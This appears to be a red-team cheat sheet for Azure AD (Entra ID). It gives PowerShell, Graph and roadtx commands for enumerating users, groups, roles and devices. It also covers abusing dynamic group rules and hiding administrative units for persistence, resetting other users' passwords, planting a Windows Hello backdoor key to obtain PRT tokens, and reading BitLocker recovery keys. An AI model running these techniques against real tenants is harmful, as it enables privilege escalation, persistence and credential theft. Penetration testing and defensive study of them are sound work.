Azure AD - IAM

Root Management Group (Tenant) > Management Group > Subscription > Resource Group > Resource

Users (User, Groups, Dynamic Groups)
Devices
Service Principals (Application and Managed Identities)

Users

List users: Get-AzureADUser -All $true

Enumerate groups

# List groups
Get-AzureADGroup -All $true

# Get members of a group
Get-AzADGroup -DisplayName '<GROUP-NAME>'
Get-AzADGroupMember -GroupDisplayName '<GROUP-NAME>' | select UserPrincipalName

Enumerate roles: Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
List roles: Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName

Add user to a group

$groupid = "<group-id>"
$targetmember = "<user-id>"
$group = Get-MgGroup -GroupId $groupid
$members = Get-MgGroupMember -GroupId $groupid
New-MgGroupMember -GroupId $groupid -DirectoryObjectid $targetmember

Dynamic Group Membership

Get groups that allow Dynamic membership:

Powershell Azure AD: Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}
RoadRecon database: select objectId, displayName, description, membershipRule, membershipRuleProcessingState, isMembershipRuleLocked from groups where membershipRule is not null;

Rule example : (user.otherMails -any (_ -contains "vendor")) -and (user.userType -eq "guest")
Rule description: Any Guest user whose secondary email contains the string 'vendor' will be added to the group

Open user's profile, click on Manage
Click on Resend invite and to get an invitation URL

Set the secondary email

PS> Set-AzureADUser -ObjectId <OBJECT-ID> -OtherMails <Username>@<TENANT NAME>.onmicrosoft.com -Verbose

Administrative Unit

Enumerate Administrative Units.

PS AzureAD> Get-AzureADMSAdministrativeUnit -All $true
PS AzureAD> Get-AzureADMSAdministrativeUnit -Id <ID>
PS AzureAD> Get-AzureADMSAdministrativeUnitMember -Id <ID>
PS AzureAD> Get-AzureADMSScopedRoleMembership -Id <ID> | fl
PS AzureAD> Get-AzureADDirectoryRole -ObjectId <RoleId>
PS AzureAD> Get-AzureADUser -ObjectId <RoleMemberInfo.Id> | fl

Administrative Unit can be used as a persistence mechanism. When the visibility attribute is set to HiddenMembership, only members of the administrative unit can list other members of the administrative unit.

az rest \
  --method post \
  --url https://graph.microsoft.com/v1.0/directory/administrativeUnits \
  --body '{"displayName": "Hidden AU Administrative Unit", "isMemberManagementRestricted":false, "visibility": "HiddenMembership"}'

Create a new Administrative Unit using the New-MgDirectoryAdministrativeUnit cmdlet.

Connect-MgGraph -Scopes "AdministrativeUnit.ReadWrite.All"
Import-Module Microsoft.Graph.Identity.DirectoryManagement

$params = @{
    displayName = "Marketing Department"
    description = "Marketing Department Administration"
    visibility = "HiddenMembership"
}

New-MgDirectoryAdministrativeUnit -BodyParameter $params

Add a member with New-MgDirectoryAdministrativeUnitMemberByRef

Connect-MgGraph -Scopes "AdministrativeUnit.ReadWrite.All"
Import-Module Microsoft.Graph.Identity.DirectoryManagement

$administrativeUnitId = "0b22c83d-c5ac-43f2-bb6e-88af3016d49f"
$paramsUser1 = @{
    "@odata.id" = "https://graph.microsoft.com/v1.0/users/52e26d18-d251-414f-af14-a4a93123b2b2"
}
New-MgDirectoryAdministrativeUnitMemberByRef -AdministrativeUnitId $administrativeUnitId -BodyParameter $paramsUser1

List members even when the administrative unit is hidden.

Connect-MgGraph -Scopes "AdministrativeUnit.Read.All", "Member.Read.Hidden", "Directory.Read.All"
Import-Module Microsoft.Graph.Identity.DirectoryManagement

$administrativeUnitId = "0b22c83d-c5ac-43f2-bb6e-88af3016d49f"
Get-MgDirectoryAdministrativeUnitMemberAsUser -AdministrativeUnitId $administrativeUnitId

Assign the User Administrator role, its ID is 947ccf23-ee27-4951-8110-96c62c680311 in this tenant.

Connect-MgGraph -Scopes "RoleManagement.ReadWrite.Directory"
Import-Module Microsoft.Graph.Identity.DirectoryManagement

$administrativeUnitId = "0b22c83d-c5ac-43f2-bb6e-88af3016d49f"
$userAdministratorRoleId = "947ccf23-ee27-4951-8110-96c62c680311"
$params = @{
    roleId = $userAdministratorRoleId
    roleMemberInfo = @{
        id = "61b0d52f-a902-4769-9a09-c6528336b00a"
    }
}

New-MgDirectoryAdministrativeUnitScopedRoleMember -AdministrativeUnitId $administrativeUnitId -BodyParameter $params

Now the user with the id 61b0d52f-a902-4769-9a09-c6528336b00a can edit the property of the other users in the Administrative Units.

Administrative Units can reset password of another user.

PS C:\Tools> $password = "Password" | ConvertToSecureString -AsPlainText -Force
PS C:\Tools> (Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "<Username>@<TENANT NAME>.onmicrosoft.com"}).ObjectId | SetAzureADUserPassword -Password $Password -Verbose

Convert GUID to SID

The user's Entra ID is translated to SID by concatenating "S-1–12–1-" to the decimal representation of each section of the Entra ID.

GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)]
SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)]

For example, the representation of 6aa89ecb-1f8f-4d92–810d-b0dce30b6c82 is S-1–12–1–1789435595–1301421967–3702525313–2188119011

Devices

List Devices

Connect-AzureAD
Get-AzureADDevice
$user = Get-AzureADUser -SearchString "username"
Get-AzureADUserRegisteredDevice -ObjectId $user.ObjectId -All $true

Device State

PS> dsregcmd.exe /status
+----------------------------------------------------------------------+
| Device State |
+----------------------------------------------------------------------+
 AzureAdJoined : YES
 EnterpriseJoined : NO
 DomainJoined : NO
 Device Name : jumpvm

Azure AD Joined : https://pbs.twimg.com/media/EQZv62NWAAEQ8wE?format=jpg&name=large
Workplace Joined : https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large
Hybrid Joined : https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large
Workplace joined on AADJ or Hybrid : https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large

Join Devices

Enroll Windows 10/11 devices in Intune

Register Devices

roadtx device -a register -n swkdeviceup

Windows Hello for Business

roadtx.exe prtenrich --ngcmfa-drs-auth
roadtx.exe winhello -k swkdevicebackdoor.key
roadtx.exe prt -hk swkdevicebackdoor.key -u <user@domain.lab> -c swkdeviceup.pem -k swkdeviceup.key
roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --keep-open -url https://portal.azure.com

Bitlocker Keys

Install-Module Microsoft.Graph -Scope CurrentUser
Import-Module Microsoft.Graph.Identity.SignIns
Connect-MgGraph -Scopes BitLockerKey.Read.All
Get-MgInformationProtectionBitlockerRecoveryKey -All
Get-MgInformationProtectionBitlockerRecoveryKey -BitlockerRecoveryKeyId $bitlockerRecoveryKeyId

Service Principals

PS C:\> Get-AzureADServicePrincipal

ObjectId                             AppId                                DisplayName
--------                             -----                                -----------
00221b6f-4387-4f3f-aa85-34316ad7f956 e5e29b8a-85d9-41ea-b8d1-2162bd004528 Tenant Schema Extension App
012f6450-15be-4e45-b8b4-e630f0fb70fe 00000005-0000-0ff1-ce00-000000000000 Microsoft.YammerEnterprise
06ab01eb-3e77-4d14-ae31-322c7730a65b 09abbdfd-ed23-44ee-a2d9-a627aa1c90f3 ProjectWorkManagement
092aaf41-23e8-46eb-8c3d-fc0ee91cc62f 507bc9da-c4e2-40cb-96a7-ac90df92685c Office365Reports
0ac66e69-5502-4406-a294-6dedeadc8cab 2cf9eb86-36b5-49dc-86ae-9a63135dfa8c AzureTrafficManagerandDNS
0c0a6d9d-48c0-4aa7-b484-4e46f77d8ed9 0f698dd4-f011-4d23-a33e-b36416dcb1e6 Microsoft.OfficeClientService
0cbef08e-a4b5-4dd9-865e-8f521c1c5fb4 0469d4cd-df37-4d93-8a61-f8c75b809164 Microsoft Policy Administration Service
0ea80ff0-a9ea-43b6-b876-d5989efd8228 00000009-0000-0000-c000-000000000000 Microsoft Power BI Reporting and Analytics</dev:code>

Other

Lists all the client IDs you can use to get a token with the mail.read scope on the Microsoft Graph:

roadtx getscope -s https://graph.microsoft.com/mail.read
roadtx findscope -s https://graph.microsoft.com/mail.read